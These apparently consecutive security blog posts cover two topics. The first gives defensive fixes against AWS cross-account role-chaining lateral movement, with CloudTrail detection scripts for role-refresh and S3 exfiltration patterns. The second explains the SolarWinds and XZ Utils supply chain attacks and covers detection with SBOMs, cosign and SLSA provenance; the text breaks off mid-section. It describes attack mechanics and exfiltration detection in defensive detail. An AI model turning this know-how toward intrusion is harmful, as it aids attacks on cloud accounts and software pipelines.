Fix 2: Add ExternalId for Confused Deputy Protection

ExternalId is an identifier agreed between the two parties establishing the cross-account trust. When the source role calls sts:AssumeRole, it must provide the ExternalId value, or the assumption is denied. AWS does not treat the value as a secret.

This protects against the confused deputy problem: a service that assumes roles on behalf of many parties cannot be tricked into assuming your role for someone else, because that other party’s requests will not carry your ExternalId.

# Source (dev Lambda) must pass ExternalId when assuming the prod role
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "api-processor-job" \
  --external-id "prod-datalake-access-v1"
# If ExternalId is wrong or absent: error — not authorized to assume role

The limitation: ExternalId does not help if the source account itself is compromised and the attacker has access to the application code or environment variables that contain the ExternalId value. It adds friction for opportunistic attackers and covers the confused deputy scenario — it is not a substitute for scoping the principal ARN.

Fix 3: Organizations SCPs to Restrict Cross-Account Assumptions

Service Control Policies at the AWS Organizations level can restrict which accounts a member account’s principals are allowed to assume roles in. An SCP constrains the principals of the accounts it is attached to; it does not evaluate callers that arrive from other accounts. Attached to the source side, it is the enforcement layer that cannot be bypassed by any identity inside a member account.

// SCP: principals in the attached accounts may only assume roles in approved target accounts
// Attach to the dev account's OU (list the account itself plus each approved target)
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RestrictCrossAccountAssumeRole",
      "Effect": "Deny",
      "Action": "sts:AssumeRole",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceAccount": [
            "111111111111",
            "222222222222"
          ]
        },
        "BoolIfExists": {
          "aws:PrincipalIsAWSService": "false"
        }
      }
    }
  ]
}

This SCP denies any sts:AssumeRole call from a governed account into a role that lives outside the approved list. Even if someone adds a trust policy in another account that admits the dev account root, dev principals cannot use it. To restrict who may assume roles in prod from the prod side, rely on the trust policy itself or a resource control policy (RCP), because an SCP on the prod OU only governs prod’s own principals.
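
The approved-pairs rule can also be stated as a small predicate, which is handy for checking CloudTrail events or unit-testing an allowlist before encoding it in policy. This is a sketch of the allowlist logic only, not of the AWS policy evaluation engine; APPROVED_PAIRS and the account IDs are illustrative.

```python
# Hypothetical allowlist of (source_account, target_account) pairs.
APPROVED_PAIRS = {
    ("111111111111", "222222222222"),
    ("333333333333", "222222222222"),
}


def assumption_permitted(source_account, target_account, approved=APPROVED_PAIRS):
    """True if a role assumption from source to target is on the allowlist."""
    if source_account == target_account:
        return True  # same-account assumptions are out of scope for this check
    return (source_account, target_account) in approved


observed = [
    ("111111111111", "222222222222"),
    ("444444444444", "222222222222"),
]
violations = [pair for pair in observed if not assumption_permitted(*pair)]
print(violations)
```

Note that the pairs are directional: approving dev into prod says nothing about prod into dev.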

Fix 4: Enable Access Analyzer Organization-Wide

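Access Analyzer should run with an organization-level analyzer in addition to per-account analyzers. The organization analyzer treats the whole organization as its zone of trust, so it flags trust policies that admit principals from outside the organization. A dev-to-prod trust inside the same organization falls within that zone, which is why the account-level analyzer in each member account still matters: it is the one that reports the dev account root on the prod role.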

# Create an organization-level analyzer (run from the management account)
aws accessanalyzer create-analyzer \
  --analyzer-name org-wide-access-analyzer \
  --type ORGANIZATION \
  --tags '{"Environment": "production", "Team": "security"}'

# List active findings organization-wide
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query "analyzers[?type=='ORGANIZATION'].arn | [0]" \
  --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"resourceType": {"eq": ["AWS::IAM::Role"]}, "status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {resource: .resource, principal: .principal}'

Fix 5: Prefer OIDC Workload Identity Over Cross-Account Roles

Where the access pattern allows it, replacing long-lived credentials and broad cross-account trust with OIDC workload identity shrinks what a leaked secret can do. A workload with an OIDC identity (a CI job or a Kubernetes service account, for example) authenticates to the prod account by exchanging a short-lived token, so there is no static access key to commit to a repository.

The federated identity trust boundaries approach does not remove the role or its trust policy: the workload still calls sts:AssumeRoleWithWebIdentity, the call is still logged in CloudTrail, and the role’s trust policy must pin the OIDC provider together with the token’s aud and sub claims. What it removes is the account-wide principal and the long-lived key, the two things the attacker needed in this incident.

Fix 6: Enable GuardDuty Cross-Account Threat Detection at Org Level

GuardDuty with multi-account management via AWS Organizations correlates threat signals across accounts. A pattern that looks like routine IAM activity in isolation — role assumption, S3 ListBucket, GetObject — reads as a lateral movement sequence when correlated across dev and prod accounts.

# Enable GuardDuty for all accounts in the organization
# (run from the GuardDuty delegated administrator account)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

# --auto-enable and --data-sources are deprecated in favor of the options below
aws guardduty update-organization-configuration \
  --detector-id "${DETECTOR_ID}" \
  --auto-enable-organization-members ALL \
  --features '[
    {"Name": "S3_DATA_EVENTS", "AutoEnable": "ALL"},
    {"Name": "EKS_AUDIT_LOGS", "AutoEnable": "ALL"},
    {"Name": "EBS_MALWARE_PROTECTION", "AutoEnable": "ALL"}
  ]'

⚠ Production Gotchas

ExternalId doesn’t protect you if the source account is compromised. The attacker who holds the dev Lambda’s execution role credentials also has access to the Lambda’s environment variables and source code — where the ExternalId value is likely stored. ExternalId is not a secret the attacker can’t reach; it is a value the legitimate caller passes to prove it initiated the request. Scope the principal ARN first; add ExternalId as a second layer.

Access Analyzer only catches public and cross-account access, not intra-account lateral movement. If the attacker is already operating inside the same account as the target role, Access Analyzer does not flag the trust relationship. Intra-account over-broad trust policies require IAM policy analysis tooling (Cloudsplaining, Prowler) to surface — Access Analyzer won’t show them.

Role chaining resets the session clock but the window is still one hour. A session obtained through role chaining is capped at one hour, whatever MaxSessionDuration is set on the target role. An attacker doing role chaining gets a fresh one-hour window at each hop. Persistent access requires refreshing before expiry, which means repeated AssumeRole calls in CloudTrail that form a detectable pattern if you’re querying for it.
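
The refresh pattern is straightforward to look for once the AssumeRole events are in hand. The sketch below groups events by caller and target role and flags pairs with several calls inside a time window. The function name, the default of three calls, and the four-hour window are assumptions to tune against your own baseline, since legitimate long-running jobs refresh too.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def refresh_patterns(events, min_calls=3, window=timedelta(hours=4)):
    """Return {(caller_arn, role_arn): total_calls} for pairs with min_calls inside window."""
    calls = defaultdict(list)
    for event in events:
        if event.get("eventName") != "AssumeRole":
            continue
        key = (event["userIdentity"]["arn"], event["requestParameters"]["roleArn"])
        # CloudTrail eventTime is UTC in the form 2024-01-15T14:12:00Z
        calls[key].append(datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ"))

    flagged = {}
    for key, times in calls.items():
        times.sort()
        # Slide over consecutive runs of min_calls timestamps.
        for i in range(len(times) - min_calls + 1):
            if times[i + min_calls - 1] - times[i] <= window:
                flagged[key] = len(times)
                break
    return flagged
```

Feeding it the output of the CloudTrail lookup shown earlier gives a short list of caller and role pairs worth a manual look.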

S3 exfiltration may not trigger GuardDuty immediately. GuardDuty’s Exfiltration:S3/ObjectRead.Unusual finding uses a behavior baseline. A new attacker session has no baseline, so the first data exfiltration may not fire the finding if the volume appears “normal” relative to what GuardDuty has seen from that role before. CloudTrail GetObject events are the reliable signal, provided S3 data events are enabled on the trail (they are not logged by default); don’t rely on GuardDuty alone for S3 exfiltration detection.
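
A baseline-free check on those GetObject events is to total the bytes read per session and compare against a fixed ceiling. The sketch below assumes S3 data events are being logged and that each record carries `additionalEventData.bytesTransferredOut`; verify that field in your own logs before relying on it. The function names and the threshold are illustrative.

```python
from collections import Counter


def bytes_read_per_session(events):
    """Sum bytes returned by S3 GetObject calls, keyed by the caller's session ARN."""
    totals = Counter()
    for event in events:
        if event.get("eventSource") != "s3.amazonaws.com":
            continue
        if event.get("eventName") != "GetObject":
            continue
        extra = event.get("additionalEventData") or {}
        totals[event["userIdentity"]["arn"]] += int(extra.get("bytesTransferredOut", 0))
    return totals


def sessions_over(events, threshold_bytes):
    """Session ARNs whose total read volume meets or exceeds the threshold."""
    totals = bytes_read_per_session(events)
    return sorted(arn for arn, total in totals.items() if total >= threshold_bytes)
```

A fixed ceiling is crude, but it fires on the first session from a new identity, which is exactly the case the behavioral finding can miss.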

arn:aws:iam::ACCOUNT:root in a trust policy does not mean the root user specifically. This is a common misread. arn:aws:iam::123456789012:root means any principal in account 123456789012 (IAM users, roles, the root user, and federated identities) whose own identity policy allows sts:AssumeRole on the target role. It hands the decision to whoever administers the other account, which is exactly why it’s dangerous in a cross-account trust policy.

Quick Reference

Lateral Movement Technique	CloudTrail Signal	Detection Tool	Structural Fix
Cross-account `sts:AssumeRole`	`AssumeRole` where source accountId ≠ target accountId in role ARN	CloudTrail + Athena query	Scope Principal to specific role ARN
Account root as trust principal	Access Analyzer ACTIVE finding on IAM Role	AWS Access Analyzer	Replace `root` with specific ARN + ExternalId
Role chaining across accounts	Multiple sequential `AssumeRole` events, each with new session token	CloudTrail session correlation	SCP restricting cross-account assumptions to approved pairs
Exfiltration via assumed prod role	S3 `GetObject`/`ListBucket` from assumed-role session in CloudTrail	CloudTrail + GuardDuty `Exfiltration:S3/ObjectRead.Unusual`	Least-privilege S3 policy on prod role + S3 Access Logs
IAM enumeration from compromised identity	`iam:ListRoles`, `iam:GetRole`, `iam:SimulatePrincipalPolicy`	GuardDuty `Recon:IAMUser/UserPermissions`	Deny `iam:*` on Lambda execution roles
Secrets Manager access via assumed role	`secretsmanager:GetSecretValue` from unexpected principal	CloudTrail resource policy audit	Attach resource policy to secrets scoping allowed principals
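
The first row of the table comes down to one comparison per CloudTrail record. Here is a small sketch of that comparison, assuming each event has already been parsed into a dict with the standard CloudTrail fields eventName, userIdentity.accountId, and requestParameters.roleArn; the function name is hypothetical, and events from AWS service principals (which carry no caller account ID) are simply skipped.

```python
def is_cross_account_assume_role(event: dict) -> bool:
    """True when the caller's account differs from the account that owns the assumed role."""
    if event.get("eventName") != "AssumeRole":
        return False

    caller_account = (event.get("userIdentity") or {}).get("accountId")
    role_arn = (event.get("requestParameters") or {}).get("roleArn", "")

    # arn:aws:iam::<account-id>:role/<name> -> the account ID is the fifth field
    parts = role_arn.split(":")
    if not caller_account or len(parts) < 6:
        return False
    return caller_account != parts[4]


def cross_account_events(events: list[dict]) -> list[dict]:
    """Filter a batch of CloudTrail records down to cross-account role assumptions."""
    return [e for e in events if is_cross_account_assume_role(e)]
```

Every hit is not an incident; approved cross-account pairs will show up too. The useful output is the set of pairs you did not expect.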

Key Takeaways

Cloud lateral movement IAM chains are not exploits — they are valid API calls that execute because someone wrote a trust policy that was too broad; the fix is always in the trust policy, not in the network
Every cross-account trust policy that uses arn:aws:iam::ACCOUNT:root as the principal is an open door for any compromised identity in that account. Scope it to the specific role ARN before an attacker finds it
CloudTrail AssumeRole events where the principal’s account ID doesn’t match the target role’s account ID are the detection signal; run the Athena query in your environment this week and look at what comes back
AWS Access Analyzer with an organization-level analyzer surfaces the vulnerable trust policies automatically — if you’re not running it, you’re auditing trust policies manually or not at all
IAM privilege escalation paths and cross-account lateral movement compound: an attacker who escalates privilege inside a source account has more roles to attempt cross-account assumptions from, extending the blast radius further
Defense in depth requires all three layers: scoped trust policy principal, ExternalId condition, and an SCP blocking assumptions from non-approved accounts — any single layer has a bypass

What’s Next

EP11 is where the series pivots from attack paths to detection engineering. We’ve covered how attackers compromise identities, escalate privilege, move laterally through cloud accounts, and exfiltrate data. EP11 asks a harder question: how do you build detection rules that catch these techniques at the kernel level — before the attack completes, not after it shows up in CloudTrail?

The answer involves eBPF: kernel-level visibility that gives you process execution context, network connections, and file system access in real time, mapped to the cloud workload identity making the API calls. A SIEM ingesting CloudTrail logs sees what happened after the fact. eBPF running on the node sees the aws sts assume-role subprocess spawn, the credential file write, and the outbound S3 connection — while it’s happening.

Get EP11 in your inbox when it publishes → subscribe at linuxcent.com

Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense

June 30, 2026 by Vamshi Krishna Santhapuri

Reading Time: 14 minutes

TL;DR

Supply chain attack detection is OWASP A06 + A08: attackers compromise the software build or distribution chain so that legitimate, signed artifacts deliver malicious payloads — standard vulnerability scanning misses this entirely
SolarWinds (December 2020): threat actors had access to the Orion build environment from late 2019, inserted the SUNBURST backdoor into digitally signed updates that shipped from March 2020, and stayed undetected until December 2020. Roughly 18,000 organizations installed the trojanized update, including the U.S. Treasury, DHS, and DoD
XZ Utils (CVE-2024-3094, March 2024): the “Jia Tan” persona spent two years building open-source credibility before inserting a backdoor into release tarballs — the backdoor was not in the git repo, only in the distributed tarball (release tarball = the compressed archive that Linux distributions download to build the package — separate from the git source tree)
The XZ backdoor targeted liblzma, which is linked into sshd via systemd on affected distros — a compromised SSH daemon on every major Linux distribution was days away from shipping
Detection relied on human observation: Andres Freund noticed a 500ms SSH connection delay during unrelated benchmarking, profiled sshd, and found it spending unexpected CPU time inside liblzma
The structural fix is a pipeline: pin dependencies with hashes + private artifact registry + SBOM generation + image signing with Sigstore/cosign — each layer catches a different attack class

OWASP Mapping: A06 Vulnerable and Outdated Components — compromised upstream dependencies. A08 Software and Data Integrity Failures — build artifacts not signed or verified; release tarball content not validated against source.

The Big Picture

┌──────────────────────────────────────────────────────────────────────────┐
│                  SUPPLY CHAIN ATTACK SURFACE                             │
│                                                                          │
│   SOURCE REPO          BUILD SYSTEM         ARTIFACT REGISTRY           │
│   github.com/org  ──▶  CI/CD pipeline  ──▶  container registry / PyPI  │
│        │                    │                      │                     │
│        │                    │                      │                     │
│   ATTACK POINT 1:      ATTACK POINT 2:       ATTACK POINT 3:            │
│   Social engineer      Compromise the        Typosquatting /             │
│   maintainer trust     build host            dependency confusion        │
│   (XZ model)           (SolarWinds model)    (public registry model)    │
│        │                    │                      │                     │
│        └────────────────────┴──────────────────────┘                    │
│                             │                                            │
│                    COMPROMISED ARTIFACT                                  │
│             (signed, valid, ships with legitimate release)               │
│                             │                                            │
│                             ▼                                            │
│        PRODUCTION SYSTEMS (18,000 orgs / every major Linux distro)      │
│                                                                          │
│   ═══════════════════════════════════════════════════════════════        │
│   DETECTION PIPELINE                                                     │
│   Hash pinning + SBOM + Sigstore verify + tarball ≠ git diff check      │
│   Each layer catches a different attack class                            │
└──────────────────────────────────────────────────────────────────────────┘

Supply chain attack detection is hard because the artifact being delivered is legitimate by every traditional check: it is signed by the vendor, it passes antivirus, it resolves from the correct registry. The attack happened before the artifact was packaged, inside the trust chain you already approved. SolarWinds and XZ Utils are not anomalies — they are the template.

Two Incidents — Same Attack Surface

SolarWinds (December 2020)

The SolarWinds compromise is the definitive build-system attack. The timeline:

September 2019   Threat actor (UNC2452, later attributed to APT29 /
                 Cozy Bear) gains access to the SolarWinds build
                 environment and begins test code injections

February 2020    SUNBURST backdoor code inserted into the SolarWinds
                 Orion build process (not into the source repository)

March–June 2020  Orion 2019.4 through 2020.2.1 builds produced with
                 SUNBURST included; binaries digitally signed by
                 SolarWinds with their valid code-signing certificate
                 and distributed to ~18,000 customers via the
                 legitimate Orion software update mechanism

December 2020    FireEye detects SUNBURST while investigating their own
                 breach, reports to SolarWinds and CISA

What made detection almost impossible:

The compiled binary passed every integrity check a customer would run. It was signed with SolarWinds’ legitimate certificate. It installed via the normal software update channel. The SUNBURST code itself was designed for low observability: it stayed dormant for 12–14 days after installation, used legitimate SolarWinds API patterns to blend with normal Orion traffic, and used legitimate cloud infrastructure (avsvmcloud.com, which resolved to valid cloud provider IPs) for command-and-control.

The C2 communication was disguised as standard Orion telemetry. Exfiltration was slow — the attackers were not bulk-extracting data, they were selecting targets and moving laterally only inside high-value organizations.

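The attack vector was the build system, not source code. SolarWinds source repositories did not contain SUNBURST. The attacker’s build-host implant (SUNSPOT) swapped a backdoored source file into the Orion build while it compiled and restored the original afterwards, so the repository never changed. A code review of the SolarWinds source would have found nothing.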

XZ Utils (CVE-2024-3094, March 2024)

The XZ Utils compromise is more instructive because it was social engineering at the package maintainer level, caught before it shipped widely — and the catch was accidental.

Timeline:

November 2021    GitHub user "Jia Tan" (JiaT75) makes first commit to
                 xz-utils repository

2022–2023        Jia Tan steadily contributes quality patches to xz-utils,
                 builds trust with maintainer Lasse Collin, is eventually
                 granted commit access

Early 2024       Jia Tan accelerates commit activity, coordinates social
                 pressure on Lasse Collin from other fake personas to
                 push releases faster

February 2024    Jia Tan releases xz 5.6.0 — backdoor code inserted in
                 the release tarball build process (not in git commits)

March 9, 2024    xz 5.6.1 released with minor obfuscation changes

March 28–29,     Andres Freund (PostgreSQL/Microsoft engineer) notices
2024             500ms SSH connection delay on his Debian sid machine
                 while running unrelated micro-benchmarks

March 29, 2024   Freund profiles sshd, finds it spending unexpected CPU
                 time inside liblzma, reports to oss-security
                 mailing list

March 30, 2024   CISA advisory published. Fedora 40 beta, Debian unstable,
                 openSUSE Tumbleweed had all shipped the affected version.
                 Ubuntu 24.04 LTS was in freeze and had it staged.

What was backdoored and how:

xz-utils provides the liblzma compression library. On systemd-based Linux distributions, sshd links against libsystemd, which links against liblzma. The backdoor hooked into sshd’s RSA key processing, specifically RSA_public_decrypt, so that an attacker holding a specific private key could bypass authentication and run commands on the host before login.

The backdoor was not visible as code in the git repository. The payload was hidden inside obfuscated binary test files that were committed to the repository, but the build-script changes that extracted and compiled it existed only in the release tarball. Comparing the released tarball to the git tree reveals files and code that do not appear in any git commit:

xz --version
# 5.6.0 or 5.6.1 = affected; 5.4.x = safe

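# How Andres Freund found it
# He was benchmarking on a quiet machine and noticed sshd logins were slow
# and CPU-heavy; his report describes profiling sshd. Attaching strace to
# the listening sshd is one way to start a similar investigation (needs root)
strace -f -p "$(pgrep -o sshd)" 2>&1 | head -20
# Upstream OpenSSH does not use liblzma; on affected distros it is loaded
# only indirectly through libsystemd, so time spent there is unexpected

# Verify tarball vs git diff (the forensic check)
# If you have both the tarball and git source (check out the matching tag):
tar xf xz-5.6.1.tar.gz
git clone --depth 1 --branch v5.6.1 https://github.com/tukaani-project/xz.git xz-git
diff -r -x .git xz-5.6.1/ xz-git/
# Release tarballs legitimately add generated autotools files (configure,
# Makefile.in). Hand-written files that differ from git, such as
# m4/build-to-host.m4 in this case, are the compromise indicator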
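
The diff -r output for a real release is noisy, so it can help to reduce the comparison to two lists: files that exist only in the tarball, and files present in both trees whose bytes differ. The sketch below assumes both trees are already unpacked on disk; compare_trees and file_digests are hypothetical helper names, and deciding which tarball-only files are expected generated output is left to the reviewer.

```python
import hashlib
from pathlib import Path


def file_digests(root: Path) -> dict[str, str]:
    """Map each regular file under root (skipping .git) to its SHA-256 digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root)
        if ".git" in rel.parts or not path.is_file():
            continue
        digests[rel.as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def compare_trees(tarball_dir: Path, git_dir: Path) -> dict[str, list[str]]:
    """Report files only in the tarball and files whose content differs from git."""
    tar_files = file_digests(tarball_dir)
    git_files = file_digests(git_dir)
    shared = set(tar_files) & set(git_files)
    return {
        "only_in_tarball": sorted(set(tar_files) - set(git_files)),
        "content_differs": sorted(n for n in shared if tar_files[n] != git_files[n]),
    }
```

Usage would look like compare_trees(Path("xz-5.6.1"), Path("xz-git")), followed by a review of anything in either list that is not known build-system output.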

What makes this attack class so dangerous:

The actor ran a multi-year operation. Two years of legitimate contributions, relationship-building with maintainers, and social pressure coordination across multiple fake personas. The code quality was good — Jia Tan’s legitimate commits improved xz-utils. The backdoor code was technically sophisticated enough that it took days of analysis to fully reverse-engineer after Freund’s discovery.

Red Phase: How Supply Chain Attacks Work in Practice

There are three distinct attack surfaces. They require different defenses and catch different attack classes.

1. Build System Compromise (SolarWinds Model)

The attacker gains access to the CI/CD or build host and modifies compiled artifacts. The source code is clean. Git history is clean. Only the build output is poisoned.

What makes it hard to catch: legitimate signing certificate, normal distribution channel, artifact passes all integrity checks that consumers run.

Simulation (safe to run in a test environment):

# Understand your build artifact's provenance
# Can you trace a production binary back to a specific source commit?

# For a Docker image: inspect build metadata
docker inspect your-org/your-image:latest | \
  jq '.[0].Config.Labels'
# Look for: org.opencontainers.image.revision (git SHA)
#           org.opencontainers.image.source (repo URL)
# If these labels are absent, you cannot verify what source built this image

# For a Go binary: read embedded build info
go version -m /path/to/binary
# Shows: Go version, module path, dependencies with versions and hashes
# If -trimpath was used during build, some info may be stripped

# Check if a container image was built from a known CI workflow
# (assumes SLSA provenance attestation is present)
# Anchor the identity to your own org and repo; a ".*" pattern would accept
# an attestation signed by any GitHub Actions workflow anywhere
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-identity-regexp="^https://github.com/your-org/your-repo/" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.buildType'

2. Dependency Hijacking: Typosquatting and Dependency Confusion

Typosquatting: a malicious package on PyPI/npm with a name close to a popular package (requets vs requests, djano vs django). Developers with a typo in their requirements.txt install the malicious package.

Dependency confusion: a private internal package (mycompany-utils) has the same name as a package an attacker uploads to the public registry with a higher version number. Package managers that check public registries before private ones will resolve the public (malicious) version.

# Test for dependency confusion: can your private package names be
# resolved from the public registry?
# Do this in a throwaway environment, NOT production

# For Python: check if your internal package name exists on PyPI
pip index versions your-internal-package-name 2>/dev/null
# If it returns versions and you didn't publish it there = confusion risk

# For npm: check if your scoped package exists on the public registry
npm view @your-scope/your-package version 2>/dev/null
# An unscoped internal package with a public registry hit = confusion risk

# For pip: audit your requirements for packages with known vulnerabilities
pip-audit --requirement requirements.txt
# pip-audit checks against the PyPI advisory data by default;
# add --vulnerability-service osv to query the OSV database instead
# Install: pip install pip-audit

# For npm: audit for both vulnerabilities and signature issues
npm audit
npm audit signatures
# 'npm audit signatures' verifies that packages in node_modules were
# signed with registry-issued keys — catches tampered downloads
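
The audit commands above look for known-bad packages; they do not notice that requets is one keystroke away from requests. A rough way to catch that in CI is a similarity check of each requirement name against the names you expect to depend on. This is only a sketch: the KNOWN_GOOD set and the 0.85 cutoff are illustrative assumptions, and the standard library's difflib stands in for a proper edit-distance metric.

```python
import difflib
import re

# Illustrative allowlist; in practice this would be your approved dependency names.
KNOWN_GOOD = {"requests", "django", "numpy", "urllib3", "flask"}


def normalize(name: str) -> str:
    """Normalize a project name the way PEP 503 does (case, dashes, dots, underscores)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def suspicious_names(requirements: list[str], known=KNOWN_GOOD, cutoff: float = 0.85) -> dict[str, str]:
    """Map each requirement that closely resembles, but is not, a known name to that name."""
    flagged = {}
    for line in requirements:
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # skip comments and pip options
            continue
        raw = re.split(r"[<>=!~;\[\s]", line, maxsplit=1)[0]
        name = normalize(raw)
        if name in known:
            continue
        close = difflib.get_close_matches(name, sorted(known), n=1, cutoff=cutoff)
        if close:
            flagged[name] = close[0]
    return flagged
```

A flagged name is a prompt for a human to look, not proof of malice; plenty of legitimate packages have similar names.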

3. Maintainer Compromise (XZ Model)

The hardest attack class to detect from the outside. A trusted maintainer is either compromised or is the attacker. Their commits are signed, their track record is legitimate, the package comes from the canonical repository.

What you can check:

# Verify a PyPI package hash matches what's listed in the index
# The hash listed on PyPI is set at upload time — if the file was
# replaced after upload, the hash would change (PyPI prevents this,
# but private/mirror registries may not)
pip download requests==2.31.0 --no-deps --dest /tmp/pkg-check/
sha256sum /tmp/pkg-check/requests-2.31.0-py3-none-any.whl
# Compare to the hash shown at pypi.org/project/requests/2.31.0/#files

# Check npm package signatures (post-XZ hygiene)
npm audit signatures
# Output shows: verified (good), missing (not signed), invalid (tampered)

# For containers: verify Sigstore signature
# The identity pattern must name your own repo; ".*" matches any signer
cosign verify \
  --certificate-identity-regexp="^https://github.com/your-org/your-repo/" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest
# If this fails: the image was not built by the expected GitHub Actions workflow

Blue Phase: Detection

SLSA: What Level Your Pipeline Should Be At

SLSA (Supply chain Levels for Software Artifacts) is a framework for build pipeline integrity. SLSA v1.0 defines three build levels above the baseline:

SLSA Level 1  Build process is scripted/automated, produces provenance
              Most teams can reach this today
              Catches: accidental modifications, basic auditability

SLSA Level 2  Build runs on a hosted build platform
              (GitHub Actions, GitLab CI); provenance is signed by the
              build platform, not just the developer
              Catches: developer workstation compromise

SLSA Level 3  Hardened build platform: each build runs isolated from
              other builds, and signing material is out of reach of
              user-defined build steps
              Provenance is non-forgeable
              Catches: cross-build tampering, most CI/CD attacks

SLSA Level 4  (SLSA v0.1 only: hermetic, reproducible builds; not part
              of the v1.0 build track)

Most teams should target SLSA Level 2 now, Level 3 within 6 months.
Level 3, combined with hermetic build steps, is where SolarWinds-class
attacks become detectable.

Container Image Signing with Sigstore/cosign

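# Sign a container image after build (in CI, using OIDC, no stored key)
# This runs inside GitHub Actions after the docker push step
# IMAGE_DIGEST is a placeholder for the sha256 digest reported by the push step;
# signing by digest binds the signature to exact content, not a movable tag
cosign sign \
  --yes \
  ghcr.io/your-org/your-image@${IMAGE_DIGEST}
# cosign uses the GitHub Actions OIDC token to obtain a short-lived
# certificate, so no long-lived private key is needed
# The signature is stored in the registry alongside the image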

# Verify the signature and check the certificate claims
cosign verify \
  --certificate-identity="https://github.com/your-org/your-repo/.github/workflows/build.yml@refs/heads/main" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq '.[0] | {
    issuer: .optional.Issuer,
    workflow: .optional.BuildSignerURI,
    repo: .optional.SourceRepositoryURI,
    ref: .optional.SourceRepositoryRef
  }'
# A passing verification means:
# - Image was built by a specific GitHub Actions workflow
# - In a specific repository, on a specific branch
# - At a specific time (cert has a 10-minute TTL)

SBOM Generation and Vulnerability Scanning

An SBOM (Software Bill of Materials) enumerates every component in a software artifact. Without an SBOM, you cannot answer “are we affected by the XZ backdoor?” across your fleet in under an hour.

# Generate an SBOM for a container image using syft
syft your-org/your-image:latest -o cyclonedx-json > sbom.json
# syft walks the image layers and catalogs every package,
# including OS packages (rpm/deb), language packages (pip/npm/go),
# and their versions

# Inspect what syft found
jq '.components[] | select(.name == "xz-libs") | {name, version, purl}' sbom.json
# Example output:
# {
#   "name": "xz-libs",
#   "version": "5.4.4-1.el9",    ← 5.4.x = safe; 5.6.0/5.6.1 = backdoored
#   "purl": "pkg:rpm/redhat/xz-libs@5.4.4-1.el9?arch=x86_64"
# }

# Scan the SBOM for known vulnerabilities
grype sbom:./sbom.json
# grype checks each component against Grype's vulnerability database
# (CVE, GHSA, OSV) — would have flagged CVE-2024-3094 once published

# Automate: generate SBOM and scan in CI, fail build if critical CVEs found
grype sbom:./sbom.json --fail-on critical

Build Provenance with GitHub Actions (SLSA Level 2/3)

# .github/workflows/build.yml
# Adds SLSA provenance attestation to every release artifact
name: Build and attest

on:
  push:
    tags: ["v*"]

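permissions:
  contents: read
  packages: write       # Required to push the image to ghcr.io
  id-token: write       # Required for OIDC signing
  attestations: write   # Required for GitHub attestation API

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      image-digest: ${{ steps.push.outputs.digest }}
    steps:
      - uses: actions/checkout@v4

      - name: Log in to GitHub Container Registry
        uses: docker/login-action@v3
        with:
          registry: ghcr.io
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}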

      - name: Build and push container image
        id: push
        uses: docker/build-push-action@v5
        with:
          push: true
          tags: ghcr.io/${{ github.repository }}:${{ github.ref_name }}

      - name: Generate SLSA provenance attestation
        uses: actions/attest-build-provenance@v1
        with:
          subject-name: ghcr.io/${{ github.repository }}
          subject-digest: ${{ steps.push.outputs.digest }}
          push-to-registry: true
          # This generates a signed SLSA provenance statement that records:
          # - Which workflow built this artifact
          # - The git SHA it was built from
          # - The trigger event
          # Stored alongside the image in the registry

# Verify the attestation against an image
gh attestation verify \
  oci://ghcr.io/your-org/your-image:latest \
  --owner your-org
# Passes: image provenance is traceable to a specific workflow run
# Fails: image was built and pushed outside any attested workflow
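
Signature verification proves who signed the attestation; policy still has to decide whether its contents are acceptable. The sketch below shows the kind of check that could run on the decoded statement after verification succeeds. It assumes an in-toto statement carrying a SLSA v1 provenance predicate (subject digests plus predicate.runDetails.builder.id); the function name and the idea of a trusted-builder prefix list are illustrative choices, not part of gh or cosign.

```python
SLSA_V1 = "https://slsa.dev/provenance/v1"


def provenance_problems(statement: dict, image_digest: str,
                        trusted_builder_prefixes: list[str]) -> list[str]:
    """Return human-readable reasons to reject a provenance statement (empty list = accept)."""
    problems = []

    if statement.get("predicateType") != SLSA_V1:
        problems.append("unexpected predicateType")

    # The attestation must be about this exact image, not just any image.
    wanted = image_digest.removeprefix("sha256:")
    subjects = {s.get("digest", {}).get("sha256") for s in statement.get("subject", [])}
    if wanted not in subjects:
        problems.append("image digest not covered by this provenance")

    # The builder identity must be one the organization has approved.
    builder_id = (
        statement.get("predicate", {}).get("runDetails", {}).get("builder", {}).get("id", "")
    )
    if not any(builder_id.startswith(prefix) for prefix in trusted_builder_prefixes):
        problems.append(f"untrusted builder: {builder_id or 'missing'}")

    return problems
```

Running this without first verifying the signature would be meaningless, since an attacker can write any JSON they like; it is a second gate, not a replacement for the first.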

What Anomaly Detection Catches

Sigstore and SBOM scanning catch known-bad artifacts. Anomaly detection catches behavior that hasn’t been classified yet:

Unexpected external connections during build: a hermetic build should make zero network calls after dependency fetch. Any egress during the build phase is a signal — a compromised build tool phoning home, a dependency pulling a secondary payload at install time
Artifact hash drift: if the same source commit produces different binary output on two consecutive builds, the build environment is non-deterministic at best, compromised at worst. Reproducible builds produce identical byte-for-byte output from identical inputs — hash drift indicates something in the build environment changed
New dependency additions without PR: any dependency that appears in a build artifact but was not added via a reviewed pull request is an anomaly. SBOMs make this comparison possible; without them it is invisible

# Check for unexpected network connections during a build
# Run this on the build host during a CI job
